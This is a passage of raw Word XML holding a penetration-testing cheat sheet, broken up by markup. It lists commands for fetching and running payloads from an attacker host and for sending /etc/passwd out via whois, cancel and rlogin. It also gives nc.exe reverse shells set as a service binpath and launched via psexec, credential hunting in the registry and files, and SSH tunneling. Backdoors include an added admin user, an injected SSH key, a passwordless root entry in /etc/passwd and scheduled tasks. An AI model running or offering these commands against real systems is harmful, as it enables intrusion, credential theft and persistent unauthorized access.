            <w:u w:val="single"/>
          </w:rPr>
          <w:t>wget.vbs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a Windows Shell and then:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139942A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cscript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wget.vbs http://$ATTACKER/file.exe localfile.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E8E87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HTTP: Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CEC209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wget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http://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$ATTACKER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/file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F6A9C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curl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http://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$ATTACKER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/file -O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD628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scp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~/file/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file.bin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user@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TARGET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:tmp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/backdoor.py</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5519F0AB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lastRenderedPageBreak/>
        <w:t>NetCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F32B44C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Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373BC23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-l -p 4444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&lt;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/tool/file.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A95B1F0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2BD7F963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Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17872375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$ATTACKER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4444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file.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366806D6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HTTP: Windows "debug.exe" Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDB1695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1. In Linux, convert binary to hex ascii:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE3FF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wine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/share/windows-binaries/exe2bat.exe /root/tools/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netcat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/nc.exe nc.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE9183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2. Paste nc.txt into Windows Shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F539B67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 xml:space="preserve">HTTP: Windows </w:t>
      </w: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BitsAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="657D7D95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cmd.exe /c "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bitsadmin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/transfer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myjob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/download /priority high http://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$ATTACKER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/payload.exe %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tmp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%\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payload.exe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&amp;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start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%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tmp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%\payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A479BB1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Whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 Data Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C919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attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB3CB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-l -v -p 43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sed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"s/ //g"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base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B4AB3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victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F19577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whois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-h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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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attackerIP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-p 43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`cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/passwd | base64`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3E2F94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Cancel Data Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB3FA1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cancel -u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$(cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/passwd)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-h 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ip:port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="498DF61C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rlogin Data Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66275B0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rlogin -l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$(cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/passwd)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-p port host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDBE0A1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Bash Ping Sweeper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24454619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gramStart"/>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE9900"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE9900"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109EFD1C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for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lastOctet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in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1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..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254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};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do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</w:p>
    <w:p w14:paraId="3E60CE59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ping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-c 1 10.0.</w:t>
      </w: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0.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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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lastOctet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grep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"bytes from"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cut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-d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 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-f 4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cut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-d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":"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-f 1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&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D9087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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27B3A5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Brute-forcing </w:t>
      </w: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XOR'ed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 string with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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1 byte</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 key in Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D23B40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lastRenderedPageBreak/>
        <w:t xml:space="preserve">encrypted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"encrypted-string-here"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBE70B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for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in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range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>0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>255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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF8210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print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</w:t>
      </w:r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join</w:t>
      </w:r>
      <w:proofErr w:type="gram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([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chr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ord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^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for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e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in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encrypted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]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231915D7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Generating Bad Character Strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1467A755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Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678B33A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'\\</w:t>
      </w:r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join</w:t>
      </w:r>
      <w:proofErr w:type="gram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([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"x{:02x}"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format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for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in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range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>256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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624899D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Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16423AE7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for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in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1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..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255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};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do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printf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"\\\x%02x"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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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i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done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echo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-e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"\r"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DA5E14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Converting Python to Windows Executable (.</w:t>
      </w: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py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 -&gt; .exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2557D48C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python pyinstaller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py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onefile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convert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to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exe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py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3581C9F0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Port Scanning with </w:t>
      </w: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NetCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F2CD62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nvv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w </w:t>
      </w:r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z host </w:t>
      </w:r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>1000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>2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06215BF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nv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u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z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w </w:t>
      </w:r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host </w:t>
      </w:r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>160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>162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D19727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Exploiting Vulnerable Windows Services: Weak Service Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA08225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># Look for SERVICE_ALL_ACCESS in the output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AD8A27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accesschk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exe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accepteula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uwcqv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"Authenticated Users"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</w:p>
    <w:p w14:paraId="6799C34C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10E61F3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config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service_name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binpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"C:\nc.exe 10.11.0.245 443 -e C:\WINDOWS\System32\cmd.exe"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obj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LocalSystem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password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""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67493ED3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qc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service_name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to verify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!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14:paraId="7FFC126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start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service_name</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:p>
    <w:p w14:paraId="045B970C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Find File/Folder Permissions Explicitly Set for a Given User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE6AB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icacls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exe C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\folder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findsid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userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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or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-*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sid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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C10F9F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//look for (F)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ull</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, (M)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odify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, (W)rite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42538DB8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AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 MSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A709CC5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reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer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v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AlwaysInstallElevated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&amp;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reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer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v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AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D3AEBA2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lastRenderedPageBreak/>
        <w:t>Stored Credentials: Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E9D4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\unattend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xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1694E80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\sysprep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inf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69969E6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\sysprep\sysprep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xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524795E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dir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c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\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vnc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ini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s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b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4FB45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dir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c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\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ultravnc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ini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s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b </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC712A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dir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c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\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s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b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findstr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si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vnc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ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2323535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1D4196D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findstr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si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password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txt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xml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ini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="784556B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findstr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si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pass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txt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xml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ini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="171D117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dir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s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cred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pass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conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51349BE3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6A4D252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 xml:space="preserve"># Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>Autologon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C96891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reg query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"HKLM\SOFTWARE\Microsoft\Windows NT\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Currentversion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\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Winlogon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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26169F09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4CDFE80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># VNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D4FA2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reg query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"HKCU\Software\ORL\WinVNC3\Password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398DB16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0BDC040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># Putty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12935630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reg query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"HKCU\Software\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SimonTatham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\PuTTY\Sessions"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395E3A8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6EF7B3F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># Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBF0429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reg query HKLM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f password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t REG_SZ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s </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0F6A0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reg query HKCU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f password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t REG_SZ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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4063F6F9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Unquoted Service Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5606732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wmic service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name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displayname</w:t>
      </w:r>
      <w:proofErr w:type="gram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pathname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startmode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findstr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"auto"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findstr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v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"c:\windows\\"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findstr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v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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507D01C0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wmic service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get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name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displayname</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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pathname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startmode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findstr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v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"C:\Windows\\"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|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findstr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v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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B90760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Creating Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635CEBE7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create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spotlessSrv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binpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"C:\nc.exe 10.11.0.245 443 -e C:\WINDOWS\System32\cmd.exe"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obj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LocalSystem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password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""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED2EAAF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Port Forwarding / SSH Tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C823FBF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SSH: Local Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD46C1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Listen on local port 8080 and forward incoming traffic to REMOT_</w:t>
      </w:r>
      <w:proofErr w:type="gram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HOST:PORT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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via SSH_SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F445367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Scenario: access a host that's being blocked by a firewall via SSH_SERVER;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B40591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ssh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-L 127.0.0.1:</w:t>
      </w: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8080:REMOTE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_HOST:PORT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user@SSH_SERVER</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7EA72D9B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lastRenderedPageBreak/>
        <w:t>SSH: Dynamic Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D9A7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Listen on local port 8080. Incoming traffic to 127.0.0.1:8080 forwards it to final destination via SSH_SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496C2E3C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Scenario: proxy your web traffic through SSH tunnel OR access hosts on internal network via a compromised DMZ box;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56368DA3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ssh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-D 127.0.0.1:8080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user@SSH_SERVER</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05E477E4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SSH: Remote Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D818D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Open port 5555 on SSH_SERVER. Incoming traffic to SSH_SERVER:5555 is tunneled to LOCALHOST:3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053E57C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Scenario: expose RDP on non-routable network;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BA85C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ssh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-R </w:t>
      </w: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5555:LOCAL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_HOST:3389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user@SSH_SERVER</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65AAC8E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plink -R </w:t>
      </w:r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ATTACKER:ATTACKER</w:t>
      </w:r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_PORT:127.0.01:80 -l root -pw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pw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ATTACKER_IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EA4D29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Proxy Tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9F18C7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Open a local port 127.0.0.1:5555. Incoming traffic to 5555 is proxied to DESTINATION_HOST through PROXY_HOST:3128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28865FF0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Scenario: a remote host has SSH running, but it's only bound to 127.0.0.1, but you want to reach it;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B454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proxytunnel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-p PROXY_HOST:3128 -d DESTINATION_HOST:22 -a 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3D1BB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ssh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user@127.0.0.1 -p 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065C34EA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HTTP Tunnel: SSH Over HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A669FC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Server - open port 80. Redirect all incoming traffic to localhost:80 to localhost:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CFDB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hts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-F localhost:22 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036E66EC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3D6F0E9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Client - open port 8080. Redirect all incoming traffic to localhost:8080 to 192.168.1.15:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F08F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htc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-F 8080 192.168.1.15:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5259188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3F0F7AA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Client - connect to localhost:8080 -&gt; get tunneled to 192.168.1.15:80 -&gt; get redirected to 192.168.1.15:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE0BFD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ssh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localhost -p 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D7CC3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Netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> - Windows Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7818523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requires admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581771F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netsh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interface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portproxy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add v4tov4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listenaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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localaddress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listenport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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localport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connectaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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destaddress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connectport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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destport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="167C8E37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RunAs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> / Start Process As</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43689A43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PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF2E4B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lastRenderedPageBreak/>
        <w:t xml:space="preserve"># Requires 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PSRemoting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="673D1B4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$username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'Administrator</w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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password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'1234test'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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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securePassword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ConvertTo-SecureString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$password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AsPlainText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-Force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$credential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New-Object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System.Management.Automation.PSCredential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$username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,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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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securePassword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Invoke-Command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-Credential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$credential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ComputerName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COMPUTER_NAME -Command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whoami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14:paraId="2E4CEBC8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57FE21D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# without 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PSRemoting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B64E1D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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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powershell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Start-Process cmd.exe -Credential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New-Object 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System.Management.Automation.PSCredential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'username'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, 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ConvertTo-SecureString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'password'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AsPlainText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-Force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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7838B970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332EF0B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without PS Remoting, with arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD4FC5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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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powershell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-command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"start-process cmd.exe -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argumentlist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'/c calc' -Credential (New-Object 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System.Management.Automation.PSCredential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'username',(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ConvertTo-SecureString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'password' -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AsPlainText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-Force))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E14C01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CMD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292D974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Requires interactive console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55109119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runas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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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user:userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779B48EA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PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B493B3C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psexec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accepteula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u user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p password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cmd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/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c c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\temp\nc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exe </w:t>
      </w:r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>10.11.0.245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90055"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>80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 cmd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exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63723AF2" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AAC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="360" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242A31"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242A31"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pth-WinExe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="304C4110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pth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winexe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U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user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%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pass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--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runas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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user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%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pass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//10.1.1.1 cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7868D2E8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Recursively Find Hidden Files: Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68701526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dir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/A:H /s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"c:\program files"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE85136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General File Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2180488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# Query the local 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db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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for a quick file find. Run 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updatedb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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before executing locate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516A461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locate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passwd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</w:p>
    <w:p w14:paraId="750EE5C5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5791B079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Show which file would be executed in the current environment, depending on $PATH environment variable;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2C002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which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wget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curl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php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perl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python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netcat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tftp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telnet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ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320F9F9B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1C6ACE4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Search for *.conf (case-insensitive) files recursively starting with /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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48796DB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find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etc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iname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*.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7573B89C" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AAC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3C2AAC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lastRenderedPageBreak/>
        <w:t>Post-Exploitation &amp; Maintaining Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737E276A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Browsing Registry Hives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BAF954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hivesh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/registry/file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FBF40B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Decrypting VNC Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CE0C6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wine vncpwdump.exe -k key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBDE2E5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Creating User and Adding to Local Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB63632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net user spotless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spotless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/add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&amp;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net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localgroup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Administrators spotless /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F49EF30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Creating SSH Authorized Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7269C1C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mkdir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/root/.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ssh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2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/dev/null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echo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ssh-rsa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 xml:space="preserve"> AAAAB3NzaC1yc2EAAAADAQABAAABAQChKCUsFVWj1Nz8SiM01Zw/BOWcMNs2Zwz3MdT7leLU9/Un4mZ7vjco0ctsyh2swjphWr5WZG28BN90+tkyj3su23UzrlgEu3SaOjVgxhkx/Pnbvuua9Qs9gWbWyRxexaC1eDb0pKXHH2Msx+GlyjfDOngq8tR6tkU8u1S4lXKLejaptiz0q6P0CcR6hD42IYkqyuWTNrFdSGLtiPCBDZMZ/5g1cJsyR59n54IpV0b2muE3F7+NPQmLx57IxoPjYPNUbC6RPh/Saf7o/552iOcmVCdLQDR/9I+jdZIgrOpstqSiJooU9+JImlUtAkFxZ9SHvtRbFt47iH7Sh7LiefP5 </w:t>
      </w:r>
      <w:proofErr w:type="spell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root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spell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/root/.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ssh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authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E3CCC9B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Creating Backdoor User w/o Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D824F51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0077AA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>echo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</w:t>
      </w:r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spotless::</w:t>
      </w:r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0:0:root:/root:/bin/bash'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etc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/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B29BDA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14:paraId="3B5E7B3A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# Rarely needed, but if you need to add a password to the previously created user by using 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useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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and passwd is not working. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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is "kali"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA30C5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sed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's</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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/!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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\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$6$o1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\.HFMVM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$a3hY6OPT</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="669900"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\/DiQYy4koI6Z3\/sLiltsOcFoS5yCKhBBqQLH5K1QlHKL8\/6wJI6uF\/Q7mniOdq92v6yjzlVlXlxkT\./'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etc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/shadow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etc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/s2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cat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etc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/s2 </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2AAC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etc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/shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2AAC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rm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etc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/s2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461DC118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Creating Another root User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E859327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useradd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-u0 -g0 -o -s /bin/bash -p </w:t>
      </w:r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`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> passwd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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yourpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EE9900"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>`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rootuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="656B2C69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Generating OpenSSL Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B93B20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lastRenderedPageBreak/>
        <w:t>openssl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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD4A68"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w: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-1 password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C228ADE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708090"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># output $1$YKbEkrkZ$7Iy/M3exliD/yJfJVeTn5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643640EF" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AAC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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242A31"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Persistent Back Doors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10660C4F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# Launch evil.exe every 10 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F2F35D" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AA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schtasks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/create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sc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minute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mo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10 /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tn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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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TaskName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2AAC">
